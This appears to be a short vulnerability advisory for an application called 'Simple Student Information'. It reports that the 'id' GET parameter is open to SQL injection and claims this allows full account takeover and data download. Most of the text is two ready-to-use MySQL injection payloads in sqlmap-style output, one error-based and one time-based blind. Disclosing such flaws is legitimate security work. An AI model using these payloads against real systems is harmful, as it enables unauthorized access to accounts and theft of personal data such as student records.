Simple Student Information
Vendor
Description:
The id parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error message was returned.
The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 1860 FROM(SELECT COUNT(*),CONCAT(0x717a7a7671,(SELECT (ELT(1860=1860,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OIeQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 5115 FROM (SELECT(SLEEP(5)))mRKE)-- uviI
---
